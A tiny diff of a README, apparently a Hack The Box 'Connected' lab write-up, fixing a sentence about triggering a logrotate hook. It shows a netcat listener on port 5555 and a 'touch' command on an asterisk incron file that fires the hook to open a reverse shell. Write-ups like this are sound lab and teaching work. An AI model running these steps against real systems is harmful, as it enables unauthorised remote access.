Collinformatics/HTB-Connected/README.md

 	$ nc -nvlp 5555

-Now we can trigger the logrotate hook, which will con:
+Now we can trigger the logrotate hook, which will initiate connection:

 	$ touch /var/spool/asterisk/incron/ucp.logrotate